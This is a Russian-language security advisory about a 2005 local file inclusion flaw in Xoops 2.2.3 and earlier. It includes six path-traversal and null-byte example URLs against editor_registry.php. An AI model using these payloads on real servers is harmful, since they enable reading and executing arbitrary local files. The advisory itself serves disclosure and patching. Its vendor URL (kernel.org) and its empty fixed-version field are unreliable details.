Security Lab

Инклюдинг локальных файлов в Xoops

Дата публикации:16.11.2005
Всего просмотров:2327
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Xoops 2.2.3 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "xoopsConfig[language]" в сценарии "class/xoopseditor/textarea/editor_registry.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе. Пример:

http://[target]/[path_to_xoops]/class/xoopseditor/textarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/textarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/koivi/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/koivi/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/
editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

Для успешной эксплуатации уязвимости, опция "magic_quotes_gpc" должна быть выключена, а опция “register_globals” - включена.

URL производителя: kernel.org

Решение: Установите последнюю версию () с сайта производителя.

Источник:

Ссылки: Vulnerabilities in Xoops